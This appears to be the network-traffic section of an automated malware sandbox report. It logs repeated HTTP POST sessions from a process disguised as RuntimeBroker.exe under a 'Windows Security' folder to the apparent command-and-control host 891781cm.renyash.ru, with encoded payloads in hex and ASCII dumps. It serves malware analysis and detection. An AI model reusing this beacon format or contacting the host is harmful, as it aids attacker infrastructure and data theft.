                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2207&min_rtt=2035&rtt_var=1109&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=427150&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          57192.168.2.449798104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:48.325735092 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1728
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:48.677963018 CET1728OUTData Raw: 55 51 58 54 5a 56 54 59 55 5a 54 59 51 5b 55 55 58 5a 5c 5f 59 54 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQXTZVTYUZTYQ[UUXZ\_YTRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)<>#;Z%X)X==3Y0'-.$\'?2'/;/.+>#*<#^!'^)#
                                                                                                                          Jan 1, 2025 04:22:48.727843046 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:49.073256016 CET948INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EeTAFTXKuFcWXgMN3kfKdcJfkIhfeYTMaOKqYli3elo5EDU3rLgDhCAnqRUsYDmeRuMJGWElipaF66LpEQIgFdN3mktAn3hsq5hpXwL3Bj%2BJ19ObWSWW0ADwcHW6glpRLYOR30L6"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6316488fc427-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3977&min_rtt=1483&rtt_var=5545&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2072&delivery_rate=68097&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 21 0d 24 5d 2f 59 3c 2e 00 59 2d 2f 37 12 26 3f 0c 1a 24 0e 2c 59 25 3d 39 15 2e 38 2b 04 28 02 2f 58 26 29 31 5a 20 08 29 04 26 26 2e 5d 04 1d 25 58 3d 2a 26 59 3f 3c 26 03 2a 31 34 16 30 37 05 5b 31 1a 33 04 27 2e 3d 00 21 0b 30 0a 24 33 24 57 2a 39 01 10 27 2d 2a 56 37 3a 2e 57 0d 12 21 0d 32 10 3e 0c 29 1f 34 1e 22 2c 2f 56 33 3c 30 0f 27 12 2c 50 37 16 26 1f 3d 11 3c 58 36 27 39 56 24 5c 23 59 35 00 26 00 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98!$]/Y<.Y-/7&?$,Y%=9.8+(/X&)1Z )&&.]%X=*&Y?<&*1407[13'.=!0$3$W*9'-*V7:.W!2>)4",/V3<0',P7&=<X6'9V$\#Y5&6"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          58192.168.2.449799104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:48.462125063 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:48.818664074 CET1056OUTData Raw: 50 56 58 53 5f 5d 54 5d 55 5a 54 59 51 53 55 5c 58 5c 5c 5d 59 54 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PVXS_]T]UZTYQSU\X\\]YTRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +<!Y!+>&==X*>'$4=- '='<?Z,(^=>$R><#^!'^)
                                                                                                                          Jan 1, 2025 04:22:48.923768044 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:49.195593119 CET803INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NWQHwyAB3MnidclGinH0THF7TgYEHDeu%2FF19uQcf6xZHySAhOsQXVuqHl9Bk07UvSbGc74Ti5Qs9ffZSLHBIzxxn3SN3pEMM6IgE2LCxwcdhGdSRSxttxMwm1Vbld7MPj%2BXhTJxM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63177baa4345-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7476&min_rtt=1716&rtt_var=12163&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=30546&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          59192.168.2.449800104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:49.327280998 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:49.677999020 CET1048OUTData Raw: 55 5f 5d 53 5f 5c 51 58 55 5a 54 59 51 5b 55 50 58 5a 5c 59 59 55 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_]S_\QXUZTYQ[UPXZ\YYUR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ <*#;[%.9[=>[09-B _0?$Z ,X ]+=$(<#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:49.765594959 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:50.029515982 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jq9uC6EbLsvTMrZWgXQwF5fXSP%2B3LV06PpGMCL9QUkAmQewgDTOqoI2QHh%2BX53Dcoag4N%2FOi4UIfBxgMckyYaMI%2B8RXO%2F38feOQ%2B4FbNcXfLOW8KD8hp9zOJxCTPhyUwECSlZhDg"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf631ccce28c1b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2507&min_rtt=1972&rtt_var=1810&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1368&delivery_rate=233375&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          60192.168.2.449801104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:50.161951065 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:50.506217003 CET1056OUTData Raw: 50 56 58 54 5a 5b 51 58 55 5a 54 59 51 58 55 53 58 5f 5c 59 59 5c 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PVXTZ[QXUZTYQXUSX_\YY\RY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +Y)[!+1=:>/['2T-B+3>W0#;'(. =#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:50.606259108 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:50.938395977 CET797INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:50 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qPRoFUWtM5Fp53A902MtIMtQs%2BQjSNSeHUvWyLD9s7PAqHY5WcEnBZjOAlGWT5CyL%2FsjPIaW7GOik0bsCurApJAyGMl4aQUh7K0xag3QOG4EtnAJNgUQs3npTQCuI3OVr0zXhlqr"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63220fdf6a5b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3720&min_rtt=1722&rtt_var=4642&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=82443&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                          Data Ascii: 41V[X
                                                                                                                          Jan 1, 2025 04:22:50.968254089 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          61192.168.2.449802104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:51.194093943 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:51.553220987 CET1056OUTData Raw: 55 5e 58 57 5f 5a 51 55 55 5a 54 59 51 59 55 56 58 5c 5c 55 59 57 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^XW_ZQUUZTYQYUVX\\UYWR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#<,6!;!%=5*.#X'2Q.4^%/"W'8;>^?$S>#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:51.640928030 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:51.908433914 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:51 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1g1TIppnBJedPNtojQkDC3Z%2FRHPqNSOCOBKd33qRNJRCjVGH8rBcyZsmw0cKoeHYXIJriC2UlAaMF9ZyWzRWitcx5VPqemo58DLj%2FsHdGfDasghKf4fcTAqP4%2FAZxakQPof5nfI6"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6328782f42ab-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2983&min_rtt=2445&rtt_var=1994&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=216168&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          62192.168.2.449803104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:52.037993908 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:52.396804094 CET1056OUTData Raw: 50 53 58 53 5a 5e 54 59 55 5a 54 59 51 5e 55 5c 58 58 5c 5b 59 53 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PSXSZ^TYUZTYQ^U\XX\[YSRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#<,)!(1^&-))7$B"Q9$]%/3,#--#=>S*<#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:52.491364002 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:52.663158894 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:52 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6YMOscuPwbXVkEE%2FT1bmzpDvxs3EC69snr%2FD00SSJoWLOF8tp%2BUgaQ23qjdOQhqJVPJvHwTWlk03pwK5D6SjPiJ36v4Hgo4kbVGaXOa0rwTGPajE213%2BoUEjkpZ1m2k8sGBwmgF"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf632dcf8f42d0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3096&min_rtt=1780&rtt_var=3299&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=118622&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          63192.168.2.449805104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:52.787784100 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:53.157778978 CET1056OUTData Raw: 55 53 58 57 5a 5b 51 5d 55 5a 54 59 51 58 55 57 58 5f 5c 5b 59 53 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USXWZ[Q]UZTYQXUWX_\[YSRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y(?.4+-_2=&>'Z'$2V.7$\$Y"P0<',?(.'(,#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:53.231676102 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:53.503355980 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:53 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uAJt996vUnHO6F595czU5HH63%2BZ%2BHNG%2Brnc3vW23zHa%2FRdCXTw28IPqfGZ37KJjBRYAw9u4d40Bl2VFpxFSmaFTpYt8W1dQsvGWmZz6ZY%2Ba0MF57cIynIQ2W0MQEnU7h%2BlJUKoYm"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63326daa15c3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3975&min_rtt=1716&rtt_var=5163&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=73755&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                          Data Ascii: 41V[X
                                                                                                                          Jan 1, 2025 04:22:53.590100050 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          64192.168.2.449806104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:53.858690023 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          65192.168.2.449807104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:54.191706896 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:54.537659883 CET1780OUTData Raw: 55 54 58 53 5f 5b 54 58 55 5a 54 59 51 52 55 5d 58 5d 5c 55 59 56 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTXS_[TXUZTYQRU]X]\UYVR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +*!+1Y%X9\=.+_$'%,4;02'Z8->8<S)<#^!'^)
                                                                                                                          Jan 1, 2025 04:22:54.671747923 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:54.848155022 CET955INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:54 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=euOwYOAmIQyZiTNG0onlirYWYPduVMR7w1R0d63rf3q3z2Pp%2BImHQ0AJLAAbzugSqHUohLpASTsSFqAphfdN%2BN%2B9iAJUgkxnNBYprYiXcD%2BS13edUnpxLiTR37Xlf7NvV3oOVgrv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf633b6c057c6a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4370&min_rtt=1979&rtt_var=5525&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=69158&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 1d 27 2b 24 06 3f 3d 22 59 2c 01 33 50 31 2f 07 00 27 30 23 06 25 2d 36 01 3a 28 02 5c 28 3b 3c 02 32 3a 36 00 37 32 2a 5b 32 1c 2e 5d 04 1d 26 01 29 39 3d 01 28 2c 25 13 3e 1c 34 5d 30 37 0a 05 32 1a 28 11 26 3d 07 02 21 54 2f 57 24 0a 3b 0a 2a 3a 27 13 27 13 3d 0f 37 00 2e 57 0d 12 22 55 32 58 39 1f 3d 32 3f 0a 22 02 3c 0d 25 3f 05 55 33 2c 02 1d 34 3b 36 52 2a 11 28 5c 21 34 36 0c 27 04 28 00 35 2a 21 5a 35 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"'+$?="Y,3P1/'0#%-6:(\(;<2:672*[2.]&)9=(,%>4]072(&=!T/W$;*:''=7.W"U2X9=2?"<%?U3,4;6R*(\!46'(5*!Z5"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          66192.168.2.449808104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:54.305439949 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
